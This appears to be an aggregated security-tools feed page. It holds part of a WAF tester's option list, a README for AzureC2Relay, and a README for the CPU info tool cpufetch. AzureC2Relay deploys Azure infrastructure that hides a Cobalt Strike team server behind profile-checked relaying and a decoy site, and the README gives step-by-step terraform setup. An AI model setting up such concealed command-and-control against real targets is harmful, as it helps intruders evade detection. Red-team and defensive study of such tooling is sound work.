    --testSet string If set then only this test set's cases will be run
    --tlsVerify If true, the received TLS certificate will be verified
    --url string URL to check (default "http://localhost/")
    --verbose If true, enable verbose logg ing (default true)
    --wafName string Name of the WAF product (default "generic")
    --workers int The number of workers to scan (default 200)
    --wsURL string WebSocket URL to check


    AzureC2Relay - An Azure Function That Validates And Relays Cobalt Strike Beacon Traffic By Verifying The Incoming Requests Based On A Cobalt Strike Malleable C2 Profile

    $
    0
    0


    AzureC2Relay is an Azure Function that validates and relays Cobalt Strikebeacontraffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile. Any incoming requests that do not share the profiles user-agent, URI paths, headers, and query parameters, will be redirected to a configurable decoy website. The validated C2 traffic is relayed to a team server within the same virtual network that is further restricted by a network security group. Allowing the VM to only expose SSH.


    Deploy

    AzureC2Relay is deployed via terraform azure modules as well as some local az cli commands

    Make sure you have terraform , az cli and the dotnet core 3.1 runtime installed

    Windows (Powershell)

    &([scriptblock]::Create((Invoke-WebRequest -UseBasicParsing 'https://dot.net/v1/dotnet-install.ps1'))) -runtime dotnet -version 3.1.0
    Invoke-WebRequest 'https://releases.hashicorp.com/terraform/0.14.6/terraform_0.14.6_windows_amd64.zip' -OutFile 'terraform.zip'
    Expand-Archive -Path terraform.zip -DestinationPath "$([Environment]::GetFolderPath('ApplicationData'))\TerraForm\"
    setx PATH "%PATH%;$([Environment]::GetFolderPath('ApplicationData'))\TerraForm\"
    Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; rm .\AzureCLI.msi

    Mac

    curl -L https://dot.net/v1/dotnet-install.sh | bash -s --  --runtime dotnet --version 3.1.0
    brew update
    brew tap hashicorp/tap
    brew install hashicorp/tap/terraform
    brew install azure-cli

    Ubuntu , Debian

    curl -L https://dot.net/v1/dotnet-install.sh | bash -s --  --runtime dotnet --version 3.1.0
    wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip
    unzip terraform_0.14.5_linux_amd64.zip
    sudo cp terraform /usr/local/bin/terraform
    curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

    Kali

    curl -L https://dot.net/v1/dotnet-install.sh | bash -s --  --runtime dotnet --version 3.1.0
    wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip
    unzip terraform_0.14.5_linux_amd64.zip
    sudo cp terraform /usr/local/bin/terraform
    echo "deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ stretch main" | sudo tee /etc/apt/sources.list.d/azure-cli.list
    curl -L https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
    sudo apt-get update && sudo apt-get install apt-transport-https azure-cli
    1. Modify the first variables defined in config.tf to suit your needs
    2. Replace the dummy "cobaltstrike-dist.tgz" with an actual cobaltstrike download
    3. Edit/Replace the Malleable profile inside the Ressources folder (Make sure the profile filename matches the variables you set in step 1)
    4. login with azure az login
    5. run terraform init
    6. run terraform apply -auto-approve to deploy the infra
    7. Wait for the CDN to become active and enjoy!

    Once terraform completes it will provide you with the needed ssh command, the CobaltStrike teamserver will be running inside an tmux session on the deployed VM

    When your done using the infra, you can remove it with terraform destroy -auto-approve



    Cpufetch - Simplistic Yet Fancy CPU Architecture Fetching Tool

    $
    0
    0


    Simplistic yet fancy CPU architecture fetching tool


    1. Support

    cpufetch currently supports x86_64 CPUs (both Intel and AMD) and ARM.

    Platformx86_64ARMNotes
    Linux
    ✔️
    ✔️
    Prefered platform.
    Experimental ARM support
    Windows
    ✔️
    Some information may be missing.
    Colors will be used if supported
    Android
    ✔️
    Experimental ARM support
    macOS
    ✔️
    Some information may be missing
    EmojiMeaning
    ✔️
    Supported
    Not supported
    Not tested

    2. Installation

    2.1 Building from source

    Just clone the repo and use make to compile it

    git clone https://github.com/Dr-Noob/cpufetch
    cd cpufetch
    make
    ./cpufetch

    The Makefile is designed to work on Linux, Windows and macOS.


    2.2 Linux

    There is a cpufetch package available in Arch Linux (cpufetch-git). If you are in another distribution, you can build cpufetch from source.


    2.2 Windows

    In the releases section you will find some cpufetch executables compiled for Windows. Just download and run it from Windows CMD. You can also build cpufetch from source.


    2.3 macOS

    You need to build cpufetch from source.


    2.4 Android
    1. Install termux app (terminal emulator)
    2. Run pkg install -y git make clang inside termux.
    3. Build from source normally:

    3. Examples

    Here are more examples of how cpufetch looks on different CPUs.


    3.1 x86_64 CPUs




    3.2 ARM CPUs

     



    4. Colors and style

    By default, cpufetch will print the CPU art with the system colorscheme. However, you can always set a custom color scheme, either specifying Intel or AMD, or specifying the colors in RGB format:

    ./cpufetch --color intel (default color for Intel)
    ./cpufetch --color amd (default color for AND)
    ./cpufetch --color 239,90,45:210,200,200:100,200,45:0,200,200 (example)

    In the case of setting the colors using RGB, 4 colors must be given in with the format: [R,G,B:R,G,B:R,G,B:R,G,B]. These colors correspond to CPU art color (2 colors) and for the text colors (following 2). Thus, you can customize all the colors.


    5. Implementation

    See cpufetch programming documentation.


    6. Bugs or improvements

    There are many open issues in github (see issues). Feel free to open a new one report an issue or propose any improvement in cpufetch

    I would like to thank Gonzalocl and OdnetninI for their help, running cpufetch in many different CPUs they have access to, which makes it easier to debug and check the correctness of cpufetch.



    Viewing all 5816 articles
    Browse latest View live


    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>